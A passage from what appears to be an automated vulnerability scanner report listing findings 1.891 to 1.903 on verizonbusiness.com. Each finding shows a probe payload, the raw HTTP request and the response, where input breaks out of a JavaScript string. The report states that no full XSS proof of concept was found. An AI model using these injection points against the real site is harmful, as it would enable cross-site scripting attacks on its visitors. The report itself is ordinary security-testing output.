User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:39:00 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 41914
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:39:00 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:39:00 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/byneed/agility15872";8ce0ad004f1/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.891. http://www.verizonbusiness.com/solutions/byneed/performance/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/byneed/performance/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7a2eb'%3b5f3bdd46a54 was submitted in the REST URL parameter 1. This input was echoed as 7a2eb';5f3bdd46a54 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions7a2eb'%3b5f3bdd46a54/byneed/performance/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:38:25 GMT
Content-Type: text/html
Content-Length: 40658
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:26 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:25 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutions7a2eb';5f3bdd46a54/byneed/performance/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.892. http://www.verizonbusiness.com/solutions/byneed/performance/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/byneed/performance/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 43f20"%3bf5eb99e09a9 was submitted in the REST URL parameter 1. This input was echoed as 43f20";f5eb99e09a9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions43f20"%3bf5eb99e09a9/byneed/performance/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:38:15 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40656
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:15 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:15 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions43f20";f5eb99e09a9/byneed/performance/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEM
...[SNIP]...

1.893. http://www.verizonbusiness.com/solutions/byneed/performance/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/byneed/performance/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 30022"%3ba70db30c06c was submitted in the REST URL parameter 2. This input was echoed as 30022";a70db30c06c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/byneed30022"%3ba70db30c06c/performance/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:38:34 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 41868
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:34 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:34 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/byneed30022";a70db30c06c/performance/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR
...[SNIP]...

1.894. http://www.verizonbusiness.com/solutions/byneed/performance/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/byneed/performance/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 22d58'%3b16f52457063 was submitted in the REST URL parameter 2. This input was echoed as 22d58';16f52457063 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/byneed22d58'%3b16f52457063/performance/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:38:45 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 41870
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:45 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:45 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/solutions/byneed22d58';16f52457063/performance/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.895. http://www.verizonbusiness.com/solutions/byneed/performance/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/byneed/performance/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2299'%3bc779c0202d8 was submitted in the REST URL parameter 3. This input was echoed as c2299';c779c0202d8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/byneed/performancec2299'%3bc779c0202d8/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:39:06 GMT
Content-Type: text/html
Content-Length: 41924
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:39:06 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:39:06 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutions/byneed/performancec2299';c779c0202d8/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.896. http://www.verizonbusiness.com/solutions/byneed/performance/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/byneed/performance/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a39d5"%3b8f683864c2d was submitted in the REST URL parameter 3. This input was echoed as a39d5";8f683864c2d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/byneed/performancea39d5"%3b8f683864c2d/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:38:57 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 41922
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:57 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:57 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/byneed/performancea39d5";8f683864c2d/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.897. http://www.verizonbusiness.com/solutions/byneed/risk/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/byneed/risk/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e5841"%3b554a50ba9a7 was submitted in the REST URL parameter 1. This input was echoed as e5841";554a50ba9a7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutionse5841"%3b554a50ba9a7/byneed/risk/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:38:22 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40642
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:22 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:22 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutionse5841";554a50ba9a7/byneed/risk/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR
...[SNIP]...

1.898. http://www.verizonbusiness.com/solutions/byneed/risk/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/byneed/risk/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 87a8d'%3bbef071f3cb9 was submitted in the REST URL parameter 1. This input was echoed as 87a8d';bef071f3cb9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions87a8d'%3bbef071f3cb9/byneed/risk/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:38:28 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40642
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:29 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:28 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutions87a8d';bef071f3cb9/byneed/risk/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.899. http://www.verizonbusiness.com/solutions/byneed/risk/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/byneed/risk/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e72af'%3b25136d1f348 was submitted in the REST URL parameter 2. This input was echoed as e72af';25136d1f348 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/byneede72af'%3b25136d1f348/risk/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:38:54 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 41856
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:54 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:54 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/solutions/byneede72af';25136d1f348/risk/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.900. http://www.verizonbusiness.com/solutions/byneed/risk/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/byneed/risk/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2ec3"%3b87b0ae20f7 was submitted in the REST URL parameter 2. This input was echoed as c2ec3";87b0ae20f7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/byneedc2ec3"%3b87b0ae20f7/risk/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:38:42 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 41852
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:42 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:42 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/byneedc2ec3";87b0ae20f7/risk/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT
...[SNIP]...

1.901. http://www.verizonbusiness.com/solutions/byneed/risk/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/byneed/risk/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9a054'%3b03f607810c5 was submitted in the REST URL parameter 3. This input was echoed as 9a054';03f607810c5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/byneed/risk9a054'%3b03f607810c5/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:39:25 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 41908
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:39:25 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:39:25 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutions/byneed/risk9a054';03f607810c5/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.902. http://www.verizonbusiness.com/solutions/byneed/risk/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/byneed/risk/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 64381"%3bb1a418d2647 was submitted in the REST URL parameter 3. This input was echoed as 64381";b1a418d2647 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/byneed/risk64381"%3bb1a418d2647/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:39:17 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 41908
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:39:17 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:39:17 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
ch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/byneed/risk64381";b1a418d2647/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.903. http://www.verizonbusiness.com/solutions/byneed/sustainability/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/byneed/sustainability/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 42a1b'%3b157729166ce was submitted in the REST URL parameter 1. This input was echoed as 42a1b';157729166ce in the application's response.

